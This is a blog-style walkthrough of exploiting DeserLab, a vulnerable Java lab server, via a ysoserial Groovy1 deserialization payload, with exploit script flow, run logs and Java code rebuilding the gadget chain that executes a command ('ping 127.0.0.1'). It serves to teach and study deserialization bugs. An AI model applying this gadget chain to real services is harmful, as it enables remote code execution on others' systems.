 class nb.deser.HashRequest implements java.io.Serializable {
 java.lang.String dataToHash;
 java.lang.String theHash;
 }

//// END class declarations

//// BEGIN instance dump
 [instance 0x7e0002: 0x7e0000/nb.deser.HashRequest
 field data:
 0x7e0000/nb.deser.HashRequest:
 dataToHash: r0x7e0003: [String 0x7e0003: "test"]
 theHash: r0x7e0004: [String 0x7e0004: "098f6bcd4621d373cade4e832627b4f6"]
 ]
 //// END instance dump

The first thing we learn from the output of both serialized data analysis tools is the fact that it IS serialized data :) The second thing we learn is that an object 'nb.deser.HashRequest' is transferred between client and server. If we combine this analysis with our previous wireshark examination we also learn that the username is sent as a string inside a TC_BLOCKDATA type:

 TC_BLOCKDATA - 0x77
 Length - 9 - 0x09
 Contents - 0x000774657374696e67

'000774657374696e67'.decode('hex')
'\x00\x07testing'
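Those two leading bytes are the standard writeUTF() framing: a two-byte big-endian length followed by the (modified) UTF-8 bytes, which is easy to verify:

```python
import struct

raw = bytes.fromhex('000774657374696e67')
(length,) = struct.unpack('>H', raw[:2])  # big-endian length prefix
assert length == 7
assert raw[2:2 + length].decode('utf-8') == 'testing'
```

Knowing this framing is what lets the python exploit script later construct the client name packet itself.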

This gives us a pretty good idea of how the DeserLab client and the DeserLab server communicate with each other. Now let’s see how we can exploit this using ysoserial.

Exploitation of DeserLab

Since we have a clear understanding of the communication, thanks to the pcap analysis as well as the analysis of the serialized data, we can build our own python script with some hard coded data in which we'll embed the ysoserial payload. To keep it simple I decided to implement it almost exactly like the wireshark flow, which looks like this:

 mydeser = deser(myargs.targetip, myargs.targetport)
 mydeser.connect()
 mydeser.javaserial()
 mydeser.protohello()
 mydeser.protoversion()
 mydeser.clientname()
 mydeser.exploit(myargs.payloadfile)

You can find the full script over here. As you can see, the easy mode approach is to hard code all the java deserialization exchanges. You might wonder why the function mydeser.exploit(myargs.payloadfile) appears after mydeser.clientname() and, maybe more importantly, how I decided it should go there. Let's have a look at my thought process as well as how to actually generate and send the ysoserial payload.

After reading several articles (references at the end of this blog post) on java deserialization there are two things that stuck with me:

  1. Most of the vulns have to do with deserialization of Java objects
  2. Most of the vulns have to do with deserialization of Java objects

So when we review the information exchange there is one place where Java objects are exchanged (as far as I can tell). This can be easily spotted in the output of the serialization analysis, since it either contains 'TC_OBJECT - 0x73' or

//// BEGIN stream content output
[blockdata 0x00: 4 bytes]
[blockdata 0x00: 2 bytes]
[blockdata 0x00: 9 bytes]
nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
//// END stream content output

where we can clearly see that the last part of the stream content is the ‘nb.deser.HashRequest’ object. The place where this object is read, is also the last part of the exchange, thus explaining why the code has the exploit function as the last one in the code. So now that we know where our exploit payload should go, how do we choose, generate and send the payload?

The code of DeserLab itself doesn't really contain anything useful that we can exploit by modifying a serialized object. The reason why will become apparent in the next section 'Manually building the payload'; for now let's just accept that. So that means we have to look for additional libraries that might contain code that could help us. In the case of DeserLab there is only one library, Groovy, which is also a really big hint for the ysoserial payload that we should use ;) Do keep in mind that for a real world application you might need to actually decompile unknown libraries and hunt for useful code (also called gadgets) yourself.

Since we know the library that we’ll use for exploitation, the generation of the payload is pretty straightforward:

java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin

An important thing to remember is that the payload delivery is blind, so if you want to know if it worked you usually need some way to detect it. For now a ping to localhost will be sufficient, but in real world scenarios you need to get a bit more creative than this.

Now that we have everything in place you’d think that it is just a matter of firing off the payload right? You are right, except that we must not forget that the Java serialization header exchange has already taken place. This means that we must strip the first four bytes of our payload and send it away:

./deserlab_exploit.py 127.0.0.1 6666 payload_ping_localhost.bin
2017-09-07 22:58:05,401 - INFO - Connecting
2017-09-07 22:58:05,401 - INFO - java serialization handshake
2017-09-07 22:58:05,403 - INFO - protocol specific handshake
2017-09-07 22:58:05,492 - INFO - protocol specific version handshake
2017-09-07 22:58:05,571 - INFO - sending name of connected client
2017-09-07 22:58:05,571 - INFO - exploiting
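The 'exploiting' step itself boils down to very little code: check that the ysoserial output really is a serialization stream, then drop the 4-byte header that was already exchanged during the handshake. A sketch, with a stand-in byte string instead of the real gadget chain:

```python
# stand-in payload: real ysoserial output starts with the same 4 bytes
payload = bytes.fromhex('aced0005') + b'\x73\x72\x00'

# STREAM_MAGIC + STREAM_VERSION were already sent during the handshake,
# so they must be stripped before the payload goes on the wire
assert payload[:4] == bytes.fromhex('aced0005'), 'not a serialization stream?'
to_send = payload[4:]
assert to_send == b'\x73\x72\x00'
```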

If everything went as planned you should see the following:

sudo tcpdump -i lo icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
22:58:06.215178 IP localhost > localhost: ICMP echo request, id 31636, seq 1, length 64
22:58:06.215187 IP localhost > localhost: ICMP echo reply, id 31636, seq 1, length 64
22:58:07.215374 IP localhost > localhost: ICMP echo request, id 31636, seq 2, length 64

Well that’s it we have successfully exploited DeserLab. This brings me to the following two sections in which we will hopefully better understand what the payload does that we send to DeserLab.

Manually building the payload

The best way to understand what our payload is doing is to rebuild the exact same payload ourselves; yes, that means writing Java. The question however is: where do we start? We can look at the serialized payload, just like we did when we looked at the pcap. The following one-liner converts the payload to a hex string that we can analyse with SerializationDumper, or you can analyse the file with jdeserialize if you prefer.

open('payload.bin','rb').read().encode('hex')

So let's dive into the details and, in this specific case, really understand how this all works. Side note: of course after figuring this all out you always find that one page that already describes it, so you can skip this section and read that instead. The rest of this section will focus on my approach. One of its important pillars was reading the source of the ysoserial implementation of this exploit. I won't be mentioning that constantly, but if you are wondering how I figured out the flow, it is due to reading the ysoserial implementation.

After putting the payload through the tools, in both cases it results in some pretty long output with a lot of Java classes. The main class name to take note of is the first one in the output: 'sun.reflect.annotation.AnnotationInvocationHandler'. This class probably looks familiar, since it seems to be the entry point for a lot of deserialization exploits. Other things that caught my attention are 'java.lang.reflect.Proxy', 'org.codehaus.groovy.runtime.ConvertedClosure' and 'org.codehaus.groovy.runtime.MethodClosure'. The reason they all caught my attention is that they reference the library that we used for exploitation as well as known classes from online articles that explain Java deserialization exploits, and they match the classes I saw in the ysoserial source.

There is one important concept you need to be aware of: when you perform deserialization attacks you are sending the 'saved' state of an object, so to speak. This means that you fully depend on the behavior of the receiving side, and more specifically on the actions taken when your 'saved' state is deserialized. If the other side does not invoke any methods of the objects that you send, you will not have remote code execution; the only influence you have is setting the properties of the objects that you send.

Now that the concept is clear, it means that the first class we send should have one of its methods called automatically if we want to achieve code execution, which explains why that first class is so special. If we look at the code of the AnnotationInvocationHandler we can see that the constructor accepts a java.util.Map object and that the readObject method calls a method on that Map object. As you probably know from reading other articles, readObject is called automatically when a stream is deserialized. Let's start building our own exploit as we go, based on this information and by borrowing code from multiple other articles (referenced at the end of this post and in the code). If you want to understand the code, read up on reflection.

 //this is the first class that will be deserialized
 String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
 //access the constructor of the AnnotationInvocationHandler class
 final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
 //normally the constructor is not accessible, so we need to make it accessible
 constructor.setAccessible(true);

This is usually the part where I spend a couple of hours debugging and reading up on all the things I don't know, since if you attempt to compile this as-is... well, you learn a lot. So here is the same code snippet, which you can actually compile:

//regular imports
import java.io.IOException;

//reflection imports
import java.lang.reflect.Constructor;

public class ManualPayloadGenerateBlog{
 public static void main(String[] args) throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException {
 //this is the first class that will be deserialized
 String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
 //access the constructor of the AnnotationInvocationHandler class
 final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
 //normally the constructor is not accessible, so we need to make it accessible
 constructor.setAccessible(true);
 }
}

You can use the following commands to compile and run the code, even though it won’t do anything:

javac ManualPayloadGenerateBlog.java
java ManualPayloadGenerateBlog

When you expand upon this code just remember the following:

  • Google the printed error codes
  • The class name should equal the file name
  • Knowing Java helps ;)

The above code makes the initial entry point class available and the constructor accessible, but what parameters do we need to feed the constructor? Most examples have something along the lines of:

constructor.newInstance(Override.class, map);

The ‘map’ parameter I understood: that is the object on which the ‘entrySet’ method will be called during the initial readObject invocation. The first parameter I don’t fully understand the inner workings of, but the main gist is that inside the readObject method a check is done to make sure the first parameter is of type ‘AnnotationType’. We accomplish this by providing the built-in ‘Override’ class, which is of that type.

Now we get to the fun part: going from 'ok, makes sense' to 'how does this work?!?!'. To understand that, it is important to realize that the second parameter is a Java Proxy object and NOT a simple Java Map object. What does this even mean? At least that was my reaction when I read that explanation initially. This article does a great job of explaining Java dynamic proxies as well as providing nice code examples. Here is a quote from the article:

Dynamic proxies allow one single class with one single method to service multiple method calls to arbitrary classes with an arbitrary number of methods. A dynamic proxy can be thought of as a kind of Facade, but one that can pretend to be an implementation of any interface. Under the cover, it routes all method invocations to a single handler – the invoke() method.

Put more simply, as I understood it: it can pretend to be a Java Map object and then route all calls to the original Map object's methods to a single method of another class. Let's visualize what we have understood until now:
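The routing idea can also be mimicked in a few lines of Python, which is roughly how I ended up thinking about it (an analogy only; the real thing goes through java.lang.reflect.Proxy and InvocationHandler.invoke()):

```python
# rough Python analogy of a Java dynamic proxy: every method call is routed
# to one handler function, so the object can pose as any interface
class Proxy:
    def __init__(self, handler):
        self._handler = handler

    def __getattr__(self, name):
        # any unknown attribute becomes a call into the single handler
        return lambda *args: self._handler(name, args)

calls = []
fake_map = Proxy(lambda method, args: (calls.append(method), 'hooked')[1])
assert fake_map.entrySet() == 'hooked'   # looks like a Map call...
assert calls == ['entrySet']             # ...but lands in the handler
```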

This means we could attempt to expand our source with such a Map object, for example like this:

final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, <unknown-invocationhandler>);

Mind the invocation handler that we still need to fit in, but don't have yet. This is where Groovy finally fits in, since up until now we remained in the realm of the regular Java classes. The reason why Groovy fits in is that it has an InvocationHandler. So when the InvocationHandler is called it eventually leads to code execution, like this:

final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("ping 127.0.0.1", "execute"), "entrySet");
final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, closure);

As you can see in the above code, we now finally have our invocation handler in the form of the ConvertedClosure object. You can confirm this by decompiling the Groovy library: when you look at the ConvertedClosure class you'll see that it extends the ConversionHandler class, and if you decompile that one you'll see:

public abstract class ConversionHandler
 implements InvocationHandler, Serializable

The fact that it implements InvocationHandler explains why we can use it in our Proxy object. One thing that I didn't understand however is how the Groovy payload went from being called through a Map proxy to actual code execution. You can use a decompiler to look at the Groovy library, but I often find I understand it better when supplementing code reading with a google query. In this case I searched for what I imagined would be a frequent development challenge:

groovy execute shell command

The above query probably lands you on a variety of pages with answers like this one or this one, which in essence tell us that Groovy String objects have an additional method: 'execute'. I often use this kind of query to deal with environments that I'm not familiar with, since executing shell commands is a frequent requirement for developers and the answer can often be found on the internet. This helped me complete the full picture of how this payload works, which in my mind now visualizes to the following:

The full source code can be found here.  You can compile and run the code like this:

javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
java -cp .:DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate > payload_manual.bin

When firing this off with our python exploit it should have the exact same result as the ysoserial payload. To my surprise the payloads even have the same hash:

sha256sum payload_ping_localhost.bin payload_manual.bin
4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_ping_localhost.bin
4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_manual.bin

Thank you for taking your time to read this article and even more important I hope it helps you to exploit Java deserialization bugs as well as better understand them.

References


Filed under: general, security Tagged: deserialization, groovy, java, ysoserial